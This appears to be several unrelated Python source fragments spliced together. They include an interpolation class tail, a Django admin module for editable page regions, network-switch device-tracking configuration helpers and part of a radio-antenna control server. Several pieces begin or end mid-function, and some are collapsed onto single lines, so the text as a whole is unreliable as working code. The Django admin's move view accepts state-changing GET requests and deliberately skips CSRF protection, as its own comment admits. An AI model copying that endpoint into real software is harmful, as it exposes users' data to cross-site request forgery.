'rbf_gauss', ('poly', {'deg': 5}), ... 'ct', 'bispl', 'linear', 'nearest']: ... if isinstance(method, tuple): ... what = method[0] ... kwds = method[1] ... else: ... what = method ... kwds = {} ... inter=num.Interpol2D(dd=dd, what=what, **kwds) ... print(fmt.format(what, inter([[-3,-4],[0,0]]))) what: rbf_multi target: [5,30] result: [ 5.00000005 29.99999959] what: rbf_inv_multi target: [5,30] result: [ 4.99999808 29.99999798] what: rbf_gauss target: [5,30] result: [ 5.00000051 30.00000352] what: poly target: [5,30] result: [ 5. 30.] what: ct target: [5,30] result: [ 4.99762256 30.010856 ] what: bispl target: [5,30] result: [ 5. 30.] what: linear target: [5,30] result: [ 5.06925208 30.13850416] what: nearest target: [5,30] result: [ 5.01385042 33.82271468] """ if dd is None: if xx is None and yy is None: self.xx = points[:,0] self.yy = points[:,1] self.points = points elif points is None: self.xx = xx self.yy = yy self.points = np.array([xx,yy]).T else: raise Exception("use points+values or xx+yy+values as input") self.values = values else: self.xx, self.yy, self.values, self.points = dd.xx, dd.yy, dd.zz, dd.XY # need to import here b/c of circular dependency rbf.py <-> num.py from pwtools import rbf if what == 'rbf_multi': self.inter = rbf.Rbf(self.points, self.values, rbf='multi', **initkwds) self.call = self.inter elif what == 'rbf_inv_multi': self.inter = rbf.Rbf(self.points, self.values, rbf='inv_multi', **initkwds) self.call = self.inter elif what == 'rbf_gauss': self.inter = rbf.Rbf(self.points, self.values, rbf='gauss', **initkwds) self.call = self.inter elif what == 'poly': self.inter = PolyFit(self.points, self.values, scale=True, **initkwds) self.call = self.inter self.call = self._poly_format_return elif what == 'ct': if CloughTocher2DInterpolator is None: raise ImportError("could not import " "scipy.interpolate.CloughTocher2DInterpolator") else: self.inter = CloughTocher2DInterpolator(self.points, self.values, **initkwds) self.call = self.inter elif 
what == 'nearest': if NearestNDInterpolator is None: raise ImportError("could not import " "scipy.interpolate.NearestNDInterpolator") else: self.inter = NearestNDInterpolator(self.points, self.values, **initkwds) self.call = self.inter elif what == 'linear': if LinearNDInterpolator is None: raise ImportError("could not import " "scipy.interpolate.LinearNDInterpolator") else: self.inter = LinearNDInterpolator(self.points, self.values, **initkwds) self.call = self.inter elif what == 'bispl': nx = min(len(np.unique(self.xx)), int(sqrt(len(self.xx)))) ny = min(len(np.unique(self.yy)), int(sqrt(len(self.yy)))) _initkwds = {'kx': 3, 'ky': 3, 'nxest': 10*nx, 'nyest': 10*ny} _initkwds.update(initkwds) bispl = bisplrep(self.xx, self.yy, self.values, **_initkwds) def _call(points, bispl=bispl, **callkwds): # For unordered points, we need to loop. ret = [bisplev(points[ii,0], points[ii,1], bispl, **callkwds) for ii in range(points.shape[0])] return np.array(ret) self.inter = _call self.call = _call else: raise Exception("unknown interpolator type: %s" %what) # See pwtools.test.test_polyfit.test_api: work around subtle PolyFit API # difference to all other interpolators w/o breaking neither Interpol2D's # nor PolyFit's API def _poly_format_return(self, *args, **kwds): return np.atleast_1d(self.inter(*args, **kwds)) def __call__(self, points,
<filename>editregions/admin/modeladmins.py # -*- coding: utf-8 -*- from __future__ import unicode_literals from functools import update_wrapper import logging from django.conf import settings from django.utils.html import strip_tags try: from django.utils.six.moves import urllib_parse urlsplit = urllib_parse.urlsplit urlunsplit = urllib_parse.urlunsplit except (ImportError, AttributeError) as e: # Python 2, < Django 1.5 from urlparse import urlsplit, urlunsplit from django.forms import Media from django.template.response import TemplateResponse from adminlinks.admin import AdminlinksMixin from django.contrib.admin.options import ModelAdmin try: from django.contrib.admin.utils import display_for_field, unquote except ImportError: from django.contrib.admin.util import display_for_field, unquote from django.core.exceptions import ObjectDoesNotExist from django.core.urlresolvers import reverse, resolve from django.http import HttpResponse, HttpResponseBadRequest, QueryDict from django.shortcuts import render_to_response from django.template import RequestContext from django.template.loader import render_to_string try: import json except ImportError: # pragma: no cover ... some older Python2 version. from django.utils import simplejson as json try: from django.utils.encoding import force_text except ImportError: # pragma: no cover ... 
    # ... < Django 1.5
    from django.utils.encoding import force_unicode as force_text
from django.utils.translation import ugettext_lazy as _
from adminlinks.templatetags.utils import _add_link_to_context
from editregions.admin.inlines import EditRegionInline
from editregions.constants import (REQUEST_VAR_REGION, REQUEST_VAR_CT,
                                   REQUEST_VAR_ID)
from editregions.utils.data import (get_modeladmin, get_content_type,
                                    get_model_class, get_configuration,
                                    attach_configuration)
from editregions.admin.changelist import EditRegionChangeList
from editregions.admin.forms import MovementForm
from editregions.admin.utils import (AdminChunkWrapper, shared_media,
                                     guard_querystring_m,
                                     TemplateRequestKeyValue)
from editregions.templatetags.editregion import chunk_iteration_context
from editregions.models import EditRegionChunk, EditRegionConfiguration
from editregions.text import (admin_chunktype_label, admin_summary_label,
                              admin_position_label, admin_modified_label,
                              region_v)

try:
    from django.utils.text import Truncator

    def truncate_words(s, num):
        # Compatibility shim: newer Django replaced truncate_words()
        # with the Truncator class.
        return Truncator(s).words(num, truncate='...')
except ImportError as e:  # pragma: no cover
    from django.utils.text import truncate_words

logger = logging.getLogger(__name__)


class EditRegionAdmin(ModelAdmin):
    # Admin for EditRegionChunk: renders per-region changelists instead of
    # the standard single changelist, and hides itself from the admin index.
    frontend_editing = True
    fields = None
    fieldsets = None
    exclude = None
    date_hierarchy = None
    ordering = None
    list_select_related = False
    save_as = False
    save_on_top = False
    actions = None
    change_list_template = 'admin/editregions/change_list.html'

    list_display = [
        # this should always be last, and not be in the list_display_links
        'get_object_tools',
        'get_subclass_type',
        'get_subclass_summary',
    ]
    list_display_links = ()
    list_filter = [
        'region',
    ]

    def __init__(self, *args, **kwargs):
        super(EditRegionAdmin, self).__init__(*args, **kwargs)
        # disables the built in link building using
        # EditRegionChangeList.url_for_result so that we can have useful
        # links that we can customise.
        self.list_display_links = self.get_list_display_links(
            request=None, list_display=self.list_display,
        )

    def get_list_display_links(self, request, list_display):
        """
        Disable the built in link building so we can have customised links
        in the changelist.
        """
        return (None,)

    def get_list_display(self, request):
        """
        A copy of the standard one, hard-copying the fields ...
        """
        return self.list_display[:]

    def get_changelist_link_html(self, obj, **kwargs):
        """Render the <a> wrapper used by the changelist columns below."""
        wrapped_obj = AdminChunkWrapper(opts=obj._meta, obj=obj,
                                        namespace=self.admin_site.name,
                                        content_id=obj.content_id,
                                        content_type=obj.content_type,
                                        region=obj.region)
        return ('<a href="{url}" data-adminlinks="autoclose" '
                'class="chunktype-{app}-{model} chunk-metadata-{caller}" '
                'data-no-turbolink>{data}</a>').format(
                    url=wrapped_obj.get_absolute_url(),
                    app=wrapped_obj.url_parts['app'],
                    model=wrapped_obj.url_parts['module'],
                    **kwargs)

    def get_subclass_type(self, obj):
        """
        get the verbose name of the given object, which is likely a subclass

        .. note::
            By using this callable, we avoid the problem of being able to
            sort by headers in the changelists (including on the change form)

        :return: the subclass object's verbose name
        :rtype: string
        """
        modeladmin = get_modeladmin(obj)
        if hasattr(modeladmin, 'get_editregions_subclass_type'):
            value = modeladmin.get_editregions_subclass_type(obj=obj)
        else:
            value = obj._meta.verbose_name
        value = strip_tags(force_text(value))
        return self.get_changelist_link_html(obj, data=value,
                                             caller='subclass')
    get_subclass_type.allow_tags = True
    get_subclass_type.short_description = admin_chunktype_label

    def get_subclass_summary(self, obj):
        """
        show a brief, HTML aware summary of the content.

        .. note::
            By using this callable, we avoid the problem of being able to
            sort by headers in the changelists (including on the change form)

        :return: short representation of the data, HTML included.
        :rtype: string
        """
        modeladmin = get_modeladmin(obj)
        if hasattr(modeladmin, 'get_editregions_subclass_summary'):
            value = modeladmin.get_editregions_subclass_summary(obj=obj)
        elif hasattr(modeladmin, 'render_into_summary'):
            context = chunk_iteration_context(index=0, value=obj,
                                              iterable=(obj,))
            context.update({'admin_summary': True})
            value = modeladmin.render_into_summary(obj=obj, context=context)
        else:
            value = '[missing]'
        value = strip_tags(force_text(value))
        return self.get_changelist_link_html(obj, data=value,
                                             caller='summary')
    get_subclass_summary.allow_tags = True
    get_subclass_summary.short_description = admin_summary_label

    def get_object_tools(self, obj):
        """
        Show the modifiers for this object. Currently just implements the
        drag handle as per `django-treeadmin`_.

        :return: the list of actions or tools available for this object
        :rtype: string
        """
        modeladmin = get_modeladmin(obj)
        if hasattr(modeladmin, 'get_editregions_subclass_tools'):
            value = modeladmin.get_editregions_subclass_tools(obj=obj)
        else:
            value = ''
        return '<div class="chunk-object-tools">{value!s}</div>'.format(
            value=value)
    get_object_tools.allow_tags = True
    get_object_tools.short_description = ''
    # We're finished our list_display fields here.

    def get_model_perms(self, request, *args, **kwargs):
        """
        Shadow method for the default ModelAdmin. Allows us to hide stufff.

        By using an empty dictionary, permissions still work, but chunk
        administration views are hidden from the default AdminSite index.

        :param request: The WSGIRequest.
        :return: Empty dictionary
        """
        return {}

    def get_urls(self):
        """Custom URL set: changelist, move endpoint, and a change view
        redirected to history (see the ticket reference below)."""
        # why this isn't a separate method in Django, I don't know.
        from django.conf.urls import patterns, url

        def wrap(view):  # pragma: no cover this is from the Django admin
            def wrapper(*args, **kwargs):
                return self.admin_site.admin_view(view)(*args, **kwargs)
            return update_wrapper(wrapper, view)

        app_label = self.model._meta.app_label
        if hasattr(self.model._meta, 'model_name'):
            model_name = self.model._meta.model_name
        else:
            model_name = self.model._meta.module_name
        info = (app_label, model_name)

        urlpatterns = patterns('',
            # parent_ct is the Django ContentType PK for the object the
            # EditRegionChunks are bound to eg: a page, a blog post, a
            # project.  parent_id is the PK of the parent object in
            # question.  We don't know what format the PK takes so we
            # accept anything.
            # url(r'^(?P<parent_ct>\d+)/(?P<parent_id>.+)/$',
            url(r'^$',
                wrap(self.changelist_view),
                name='%s_%s_changelist' % info),
            # moving an object from one position to another, potentially
            # across regions.
            url(r'^move/$',
                wrap(self.move_view),
                name='%s_%s_move' % info),
            # this thing is needed, unfortunately, to enable the delete
            # screen to work on EditRegionChunk subclasses.
            # see https://code.djangoproject.com/ticket/20640
            # As I'm not thrilled with the idea of finding the wrong edit
            # screen ... we're going to re-point it at the history view.
            url(r'^(.+)/$',
                wrap(self.history_view),
                name='%s_%s_change' % info),
        )
        return urlpatterns
    urls = property(get_urls)

    def move_view(self, request):
        """
        Allows us to move a Chunk from one place to another.

        Yes, it accepts request.GET, because I can't be bothered to monkey
        patch the jQuery ajax sending to send a CSRF token. Screw it.

        Data received in the request should be:
            * `pk`
            * `position`
            * `region`

        The form then handles moving everything in .save()
        """
        form = MovementForm(data=request.GET, files=None, initial=None)
        if form.is_valid() and self.has_change_permission(
                request, form.cleaned_data['pk']):
            form.save()
            html = self.render_changelists_for_object(
                request=request, obj=form.cleaned_data['pk'].content_object)
            json_data = {
                'action': 'move',
                'html': html,
                'primary_key': form.cleaned_data['pk'].pk,
            }
            self.log_change(request, *form.change_message())
            self.log_change(request, *form.parent_change_message())
            return HttpResponse(json.dumps(json_data),
                                content_type='application/json')
        return HttpResponseBadRequest(json.dumps(form.errors),
                                      content_type='application/json')

    def get_queryset(self, *args, **kwargs):
        """
        Don't use the default queryset/manager, as it won't be our interface
        to polymorphic (downcast) EditRegionChunk subclasses.

        :param args: Stuff to pass through to
            :meth:`~django.contrib.admin.options.BaseModelAdmin.get_ordering`
        :param kwargs: Stuff to pass through to
            :meth:`~django.contrib.admin.options.BaseModelAdmin.get_ordering`
        :return: our EditRegionChunks, but already downcast to their final
            form.
        :rtype: :class:`~django.db.models.query.QuerySet`
        """
        qs = self.model.polymorphs.all().select_subclasses()
        ordering = self.get_ordering(*args, **kwargs)
        if ordering:  # pragma: no cover ... I don't care, this should be fine.
            qs = qs.order_by(*ordering)
        return qs
    queryset = get_queryset

    def get_object(self, request, object_id):
        """
        This overrides the default, to catch ObjectDoesNotExist, because we
        can't guarantee what model is being referenced, as it's polymorphic.
        """
        queryset = self.queryset(request)
        try:
            return queryset.get(pk=object_id)
        except ObjectDoesNotExist:
            return None

    def get_changelist(self, *args, **kwargs):
        """Always use our region-aware ChangeList subclass."""
        return EditRegionChangeList

    def changelist_view(self, request, extra_context=None):
        """Render one changelist per region for the parent object named in
        the querystring; AJAX requests get just the HTML fragment."""
        parent_ct = request.GET[REQUEST_VAR_CT]
        parent_id = request.GET[REQUEST_VAR_ID]
        obj = get_model_class(parent_ct).objects.get(pk=parent_id)
        extra_context = extra_context or {}
        if request.is_ajax():
            return HttpResponse(
                self.render_changelists_for_object(request=request, obj=obj))
        context = self.changelists_as_context_data(request, obj)
        opts = self.model._meta
        app_label = opts.app_label
        context.update({
            'module_name': force_text(opts.verbose_name_plural),
            'title': _('Select %s to change') % force_text(opts.verbose_name),
            'media': self.media,
            'app_label': app_label,
            'cl': {
                'opts': {
                    'app_label': app_label,
                    'verbose_name_plural': opts.verbose_name_plural,
                }
            }
        })
        context.update(extra_context or {})
        return TemplateResponse(request, self.change_list_template,
                                context, current_app=self.admin_site.name)

    def get_changelists_for_object(self, request, obj, **kwargs):
        # NOTE(review): this method continues past the end of this chunk;
        # only the visible portion is documented here.
        changelists = []
        if obj is not None:
            logger.debug('Editing `{obj!r}`, so do '
                         '`get_changelists_for_object`'.format(obj=obj))
            attach_configuration(obj, EditRegionConfiguration)
            config = get_configuration(obj)
            # Dynamic template changes ...
            obj_admin = get_modeladmin(admin_namespace=self.admin_site.name,
                                       obj=obj)
            if hasattr(obj_admin, 'editregions_template_field'):
                fieldname = obj_admin.editregions_template_field
                template_name = request.GET.get(fieldname, None)
                kv = TemplateRequestKeyValue(key=fieldname,
                                             value=template_name)
                if config.is_valid_template(template_name):
                    logger.debug("{kv!r} was valid for this {obj!r} "
                                 "and {modeladmin!r}".format(
                                     kv=kv, obj=obj, modeladmin=obj_admin))
                    config.set_template(template_name)
            # store the old get here, because it gets changed inside the
            # region loops, which is a lossy process.
            old_get = request.GET
            # mutate the querystring and set some data onto it, which will
            # be passed to the get_changelist_filters method, as well as
            # being used to filter the ChangeList correctly.
            # new_get = request.GET.copy()
            new_get = QueryDict('', mutable=True)
            new_get[REQUEST_VAR_CT] = get_content_type(obj).pk
            new_get[REQUEST_VAR_ID] = obj.pk
            for region in config.config:
                new_get[REQUEST_VAR_REGION] = region
                request.GET = new_get
                our_list_display = self.list_display[:]
                our_list_links = self.get_list_display_links(
                    request=request, list_display=our_list_display)
                ChangeList = self.get_changelist(request, **kwargs)
                cl = ChangeList(request=request, model=self.model,
                                list_display=our_list_display,
                                list_display_links=our_list_links,
                                list_filter=self.list_filter,
                                date_hierarchy=None, search_fields=None,
                                list_select_related=None, list_per_page=100,
                                list_max_show_all=100, list_editable=None,
                                model_admin=self, parent_obj=obj,
                                parent_conf=config)
                changelists.append(cl)
            # as the internal request.GET
# --- truncated in source: tail of the preceding "add static entry" helper
# (its ``def`` line lies before this chunk, so it is not reproduced):
#   cmd = "device-tracking binding vlan {vlan} {address} interface "
#         "{interface} {mac} tracking {tracking}"
#   ... device.configure(cmd) / raise on SubCommandFailure ...


def configure_device_tracking_binding_options(device, reachable_lifetime=None,
                                              stale_lifetime=None,
                                              down_lifetime=None,
                                              max_entries=None, mac_limit=None,
                                              port_limit=None, vlan_limit=None,
                                              logging=False):
    """ Configures device-tracking binding options

    Args:
        device ('obj'): device object
        reachable_lifetime ('str', optional): Max time in REACHABLE without
            activity - 1-86400 or "infinite". Defaults to None
        stale_lifetime ('str', optional): Max time in STALE without
            activity - 1-86400 or "infinite". Defaults to None
        down_lifetime ('str', optional): Max time in DOWN without
            activity - 1-86400 or "infinite". Defaults to None
        max_entries ('int', optional): Max number of entries - 1-1000000.
            Defaults to None
        mac_limit ('int', optional): Max number of mac entries. Defaults to None
        port_limit ('int', optional): Max number of port entries. Defaults to None
        vlan_limit ('int', optional): Max number of vlan entries. Defaults to None
        logging ('bool', optional): Enable syslog logging of binding table
            events. Defaults to False

    Returns:
        None

    Raises:
        SubCommandFailure: Failed to configure device-tracking binding
    """
    config = []
    # Only used to produce a helpful failure message.
    debug_dict = {
        "reachable-lifetime": reachable_lifetime,
        "stale-lifetime": stale_lifetime,
        "down-lifetime": down_lifetime,
        "max-entries": max_entries,
        "mac-limit": mac_limit,
        "port-limit": port_limit,
        "vlan-limit": vlan_limit,
    }

    if logging:
        config.append("device-tracking binding logging")

    # The CLI accepts max-entries limits in the order of vlan->port->mac,
    # otherwise the options will not be set as intended
    if max_entries:
        limit = "max-entries {max_entries} ".format(max_entries=max_entries)
        if vlan_limit:
            limit += "vlan-limit {} ".format(vlan_limit)
        if port_limit:
            limit += "port-limit {} ".format(port_limit)
        if mac_limit:
            limit += "mac-limit {} ".format(mac_limit)
        config.append("device-tracking binding {limit}".format(limit=limit))

    # The CLI accepts lifetime timers in the order of reachable->stale->down,
    # otherwise the options will not be set as intended
    if any([reachable_lifetime, stale_lifetime, down_lifetime]):
        lifetime = ""
        if reachable_lifetime:
            lifetime += "reachable-lifetime {} ".format(reachable_lifetime)
        if stale_lifetime:
            lifetime += "stale-lifetime {} ".format(stale_lifetime)
        if down_lifetime:
            lifetime += "down-lifetime {} ".format(down_lifetime)
        config.append("device-tracking binding {lifetime}".format(lifetime=lifetime))

    try:
        device.configure(config)
    except SubCommandFailure:
        raise SubCommandFailure(
            "Failed to configure device-tracking binding with parameters: {params} " \
            .format(params=debug_dict)
        )


def unconfigure_device_tracking_binding_options(device, reachable_lifetime=False,
                                                stale_lifetime=False,
                                                down_lifetime=False,
                                                max_entries=False,
                                                logging=False):
    """ Unconfigures device-tracking binding options

    Args:
        device ('obj'): device object
        reachable_lifetime ('bool', optional): Unconfigure reachable-lifetime.
            Defaults to False
        stale_lifetime ('bool', optional): Unconfigure stale-lifetime.
            Defaults to False
        down_lifetime ('bool', optional): Unconfigure down-lifetime.
            Defaults to False
        max_entries ('bool', optional): Unconfigure max-entries.
            Defaults to False
        logging ('bool', optional): Disable syslog logging of binding table
            events. Defaults to False

    Returns:
        None

    Raises:
        SubCommandFailure: Failed to unconfigure device-tracking binding
    """
    config = []
    prefix_dict = {
        "reachable-lifetime": reachable_lifetime,
        "stale-lifetime": stale_lifetime,
        "down-lifetime": down_lifetime,
        "max-entries": max_entries,
        "logging": logging,
    }

    # Emit one "no device-tracking binding <option>" per requested flag.
    for key, value in prefix_dict.items():
        if value:
            config.append("no device-tracking binding {key}".format(key=key))

    try:
        device.configure(config)
    except SubCommandFailure:
        raise SubCommandFailure(
            "Failed to unconfigure device-tracking binding with parameters: {params}" \
            .format(params=prefix_dict)
        )


def configure_ipv6_destination_guard_attach_policy(device, policy,
                                                   interface=None, vlan=None):
    """ Attach ipv6 destination-guard policy

    Args:
        device ('obj'): device object
        policy ('str'): policy name
        interface ('str', optional): interface name. Defaults to None
        vlan ('str', optional): vlan id list - Eg. "1-10,15". Defaults to None.

    Returns:
        None

    Raises:
        ValueError: Neither an interface nor a vlan was supplied
        SubCommandFailure: Failed to attach ipv6 destination-guard policy
    """
    if interface is None and vlan is None:
        raise ValueError("There is no specified target to attach policy." \
                         "Ensure there is either an interface or a vlan as input")

    config = []
    # The policy is attached under either the interface or the vlan scope.
    if interface:
        config.append("interface {interface}".format(interface=interface))
    elif vlan:
        config.append("vlan config {vlan}".format(vlan=vlan))
    config.append("ipv6 destination-guard attach-policy {policy}".format(policy=policy))

    try:
        device.configure(config)
    except SubCommandFailure:
        log.warning("Failed to attach ipv6 destination-guard policy")
        raise


def configure_ipv6_destination_guard_detach_policy(device, policy,
                                                   interface=None, vlan=None):
    """ Detach ipv6 destination-guard policy

    Args:
        device ('obj'): device object
        policy ('str'): policy name
        interface ('str', optional): interface name. Defaults to None
        vlan ('str', optional): vlan id list - Eg. "1-10,15". Defaults to None.

    Returns:
        None

    Raises:
        ValueError: Neither an interface nor a vlan was supplied
        SubCommandFailure: Failed to detach ipv6 destination-guard policy
    """
    if interface is None and vlan is None:
        raise ValueError("There is no specified target to attach policy." \
                         "Ensure there is either an interface or a vlan as input")

    config = []
    if interface:
        config.append("interface {interface}".format(interface=interface))
    elif vlan:
        config.append("vlan config {vlan}".format(vlan=vlan))
    config.append("no ipv6 destination-guard attach-policy {policy}".format(policy=policy))

    try:
        device.configure(config)
    except SubCommandFailure:
        log.warning("Failed to deattach ipv6 destination-guard policy")
        raise


def configure_ipv6_destination_guard_policy(device, policy_name,
                                            enforcement=None):
    """ Configure ipv6 destination-guard policy

    Args:
        device ("obj"): The device to configure the policy on
        policy_name ("str"): the name of the policy
        enforcement ("str", optional): The enforcement policy to set -
            Eg. "always" or "stressed". Defaults to None.

    Returns:
        None

    Raises:
        SubCommandFailure: Failed to configure ipv6 destination-guard policy
    """
    config_cmds = []
    config_cmds.append("ipv6 destination-guard policy {policy_name}".format(policy_name=policy_name))
    if enforcement:
        config_cmds.append("enforcement {enforcement}".format(enforcement=enforcement))

    try:
        device.configure(config_cmds)
    except SubCommandFailure:
        log.warning("Failed to configure ipv6 destination-guard policy {policy_name}"
                    .format(policy_name=policy_name))
        raise


def unconfigure_ipv6_destination_guard_policy(device, policy_name):
    """ Unconfigure ipv6 destination_guard policy

    Args:
        device ("obj"): the device to unconfigure the policy on
        policy_name ("str"): The name of the policy

    Returns:
        None

    Raises:
        SubCommandFailure: Failed to unconfigure ipv6 destination-guard policy
    """
    try:
        device.configure([
            "ipv6 destination-guard policy {policy_name}".format(policy_name=policy_name),
            "no enforcement"
        ])
    except SubCommandFailure:
        log.warning("Failed to unconfigure ipv6 destination-guard {policy_name}"
                    .format(policy_name=policy_name))
        raise


def configure_device_tracking_tracking(device, auto_source=None,
                                       retry_interval=None):
    """ Configure device-tracking tracking

    Args:
        device ("obj"): The device to configure
        auto_source ("str", optional): "override", or a fallback address for
            auto-source. Defaults to None.
        retry_interval ("str", optional): Device-tracking retry-interval in
            seconds. Defaults to None.

    Returns:
        None

    Raises:
        SubCommandFailure: Failed to configure device-tracking tracking
    """
    config_cmds = []
    if auto_source:
        # Anything other than the literal "override" is treated as a
        # fallback address.
        if auto_source != "override":
            config_cmds.append("device-tracking tracking auto-source fallback {fallback_addr}".format(fallback_addr=auto_source))
        else:
            config_cmds.append("device-tracking tracking auto-source override")
    if retry_interval:
        config_cmds.append("device-tracking tracking retry-interval {retry_interval}".format(retry_interval=retry_interval))

    try:
        device.configure(config_cmds)
    except SubCommandFailure:
        log.warning("Failed to configure device-tracking tracking")
        raise


def clear_device_tracking_database(device, options=None):
    """ Clear device-tracking database

    Bug fixes vs. the previous revision:
      * ``"vlanid {vlanid}".format(...)`` and
        ``"interface {interface}".format(...)`` were called with positional
        arguments for *named* format fields, raising ``KeyError`` at runtime;
        the keyword arguments are now supplied.
      * ``"policy {policy}",format(policy=...)`` used a comma instead of a
        dot, building a tuple / calling builtin ``format`` and raising
        ``TypeError``; now a proper ``str.format`` call.
      * An empty suffix no longer leaves a trailing space on the emitted
        CLI command.

    Args:
        device ('obj'): device object
        options ('dict', optional): flat and nested clear options:
            force ('bool'): clear all entries
            policy ('str'): policy name
            vlanid ('str'): vlan id
            interface ('dict'): {"interface": <name>,
                                 "force"/"vlanid": <suffix>}
            address/mac/prefix ('dict'): {"address": <addr>,
                "target": {"force"/"interface"/"policy"/"vlanid": <suffix>}}

    Returns:
        None

    Raises:
        SubCommandFailure: Failed to clear the device-tracking database
    """
    config = []
    prefix = "clear device-tracking database"
    # These options share the same "<option> <address> [<target>]" shape.
    nested_options_list = [
        "address",
        "mac",
        "prefix",
    ]

    if options is None:
        config.append(prefix)
    else:
        if options.get("force", None):
            config.append("{prefix} force".format(prefix=prefix))
        if options.get("policy", None):
            config.append("{prefix} policy {policy}".format(prefix=prefix, policy=options['policy']))
        if options.get("vlanid", None):
            config.append("{prefix} vlanid {vlanid}".format(prefix=prefix, vlanid=options['vlanid']))

        if options.get("interface", None):
            interface_dict = options["interface"]
            if interface_dict.get("interface", None):
                target = interface_dict["interface"]
                suffix = ""
                if interface_dict.get("force", None):
                    suffix = "force"
                elif interface_dict.get("vlanid", None):
                    # FIX: keyword argument was missing, causing KeyError.
                    suffix = "vlanid {vlanid}".format(vlanid=interface_dict["vlanid"])
                # Join non-empty parts so a missing suffix does not leave a
                # trailing space.
                config.append(" ".join(
                    part for part in (prefix, "interface", target, suffix) if part))

        for option in nested_options_list:
            if options.get(option, None):
                address_dict = options[option]
                if address_dict.get("address", None):
                    address = address_dict["address"]
                    opt = "{key} {value}".format(key=option, value=address)
                    suffix = ""
                    if address_dict.get("target", None):
                        target_dict = address_dict["target"]
                        if target_dict.get("force", None):
                            suffix = "force"
                        elif target_dict.get("interface", None):
                            # FIX: keyword argument was missing.
                            suffix = "interface {interface}".format(interface=target_dict["interface"])
                        elif target_dict.get("policy", None):
                            # FIX: "," typo instead of "." broke this call.
                            suffix = "policy {policy}".format(policy=target_dict["policy"])
                        elif target_dict.get("vlanid", None):
                            suffix = "vlanid {vlanid}".format(vlanid=target_dict["vlanid"])
                    config.append(" ".join(
                        part for part in (prefix, opt, suffix) if part))

    try:
        device.execute(config)
    except SubCommandFailure:
        raise SubCommandFailure(
            "Failure to clear device-tracking database"
        )


# --- truncated in source: ``clear_device_tracking_counters`` continues past
# the end of this chunk and is therefore not reproduced here ---
'az' and 'el' b.compute(self.equipment["Antenna"]) source = b.to_dict() if filter_fn(source): sources[source_name] = source else: self.logger.error( "get_sources: Couldn't find source {}".format(source_name)) now = ephem.now() self.logger.debug( "get_sources: setting Antenna's date to {}".format(now)) self.equipment["Antenna"].date = now # reset time to compute new data self.get_sources.cb(sources) # send client the dict 'sources' if len(sources) == 1: return sources[list(sources.keys())[0]] else: return sources def report_source_info(self, name_or_dict, units="degrees"): """ Create a descriptive string about a given source. Examples: >>> server.report_source_info("0521-365") ["0521-365: az el: 221.960453 -0.494930", "0521-365: ra dec: 80.893983 -36.447495", "0521-365: J2000 ra dec: 80.741603 -36.458570"] Args: name_or_dict (str/dict): The name of a source or verifier or a dictionary containing its calculated position units (str, optional): units in which to report source coordinates. Returns: str: description of source """ if units.lower() == "degrees" or units.lower() == "deg": convert = 180./np.pi elif units.lower() == "radians" or units.lower() == "rad": convert = 1.0 if hasattr(name_or_dict, "keys") and hasattr(name_or_dict, "__iter__"): src_name = name_or_dict["name"] else: src_name = name_or_dict src_info0 = self.get_sources(source_names=src_name) src_info1 = self.get_sources(source_names=src_name, when=datetime.datetime.utcnow()+datetime.timedelta(minutes=5)) if src_info1["el"] > src_info0["el"]: rising = "rising" else: rising = "setting" self.logger.debug( "report_source_info: {}, {}".format(src_name, src_info0)) lines = [] if "info" in src_info0: lines.append( "{}: extra info: {}".format(src_name, src_info0["info"])) lines.append( "{}: az el: {:.6f} {:.6f}".format( src_name, src_info0["az"]*convert, src_info0["el"]*convert)) lines.append( "{}: ra dec: {:.6f} {:.6f}".format( src_name, src_info0["ra"]*convert, src_info0["dec"]*convert)) lines.append( "{}: 
J2000 ra dec: {:.6f} {:.6f}".format( src_name, src_info0["_ra"]*convert, src_info0["_dec"]*convert)) lines.append( "{}: {}".format(src_name, rising)) return lines def is_within(self, name_or_dict, bounds, axis="el"): """ Determine whether a source is within certain coordinate bounds. Examples: Determine if a given source is in DSS-43's sensitivity sweet spot, between 40 and 60 degrees elevation. .. code-block::python >>> server.is_within("0521-365",(40,60)) False >>> server.is_within("g1107264_302906s", (0, 90), axis="az") True Args: name_or_dict (str/dict): A str corresponding to a source's name, or a dictionary containing the sources information. bounds (list/tuple): The bounds within which we're looking. axis (str, optional): "el" or "az" ("el"). Returns: bool: True if in between bounds, False otherwise """ convert = 180./np.pi src = self._get_source_from_str_or_dict(name_or_dict) axis_val = src[axis.lower()]*convert if axis_val >= bounds[0] and axis_val <= bounds[1]: return True return False def _get_source_from_str_or_dict(self, name_or_dict, **kwargs): """ Given either a name or a dict, get a dictionary corresponding to the source. Args: name_or_dict (str/dict): a name of a source, or a dictionary representation of the source. Returns: dict: a dictionary corresponding to the requested source. 
""" if isinstance(name_or_dict, six.string_types): src_dict = self.get_sources(source_names=name_or_dict, **kwargs) elif isinstance(name_or_dict, dict): src_dict = name_or_dict else: raise TypeError( "Can't recognize argument name_or_dict of type {}".format( type(name_or_dict))) return src_dict def _get_src_info_dict(self, src_dict): self.logger.debug( "_get_src_info_dict: src_dict: {}".format(src_dict)) src_obj = Aeph.SerializableBody.from_dict(src_dict) self.logger.debug( ("_get_src_info_dict: " "adding source info for source {} to file").format(src_obj.name)) observer = src_obj.get_observer() observer.date = ephem.now() src_obj.compute(observer) src_info = { "name": src_obj.name, "ra_J2000": src_obj._ra, "dec_J2000": src_obj._dec, "az": src_obj.az, "el": src_obj.alt } if "flux" in src_obj.info: src_info['flux'] = src_obj.info["flux"]['K'] return src_info def _add_src_info_to_file(self, f_obj, src_dict): """ Given some source dictionary, add it's information to the attrs of an HDF5 file object or group. Args: f_obj (h5py.File/h5py.Group): HDF5 file object or group src_dict (dict): a dictionary that can be turned into a SerializableBody. """ src_info = self._get_src_info_dict(src_dict) for attr in src_info: f_obj[attr] = src_info[attr] # ------------------------- Observatory Details --------------------------- @support.test.auto_test() def _get_observer_info_dict(self): """ Get a dictionary with current observer information. """ observer_info = { "lat": self.equipment["Antenna"].lat, "lon": self.equipment["Antenna"].lon, "elevation": self.equipment["Antenna"].elevation, "epoch": self.equipment["Antenna"].epoch, "date": self.equipment["Antenna"].date } return observer_info # ------------------------- Antenna Control ------------------------------- def point(self, name_or_dict): """ Go to source Given some source or verifier name or dict, send command to antenna to point. This will not wait for the antenna to be on point, however. 
